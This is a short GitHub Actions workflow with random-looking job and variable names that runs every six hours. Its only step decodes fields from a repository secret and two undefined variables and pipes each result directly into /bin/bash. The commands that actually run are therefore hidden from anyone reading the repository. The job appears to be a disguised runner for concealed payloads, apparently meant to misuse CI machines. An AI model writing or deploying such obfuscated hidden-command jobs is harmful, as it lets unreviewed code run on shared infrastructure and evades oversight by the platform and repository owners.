name: honortwisting

on:
  workflow_dispatch:
  schedule:
    - cron: '33 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: honortwisting
        env:
          gwxnw417: ${{ secrets.gwxnw417 }}
        run: |
          echo $gwxnw417 | jq -r .ea59 | /bin/bash
          echo $iw62038 | jq -r .ujrc13480 | /bin/bash
          echo $pa6 | jq -r .whte92492 | /bin/bash

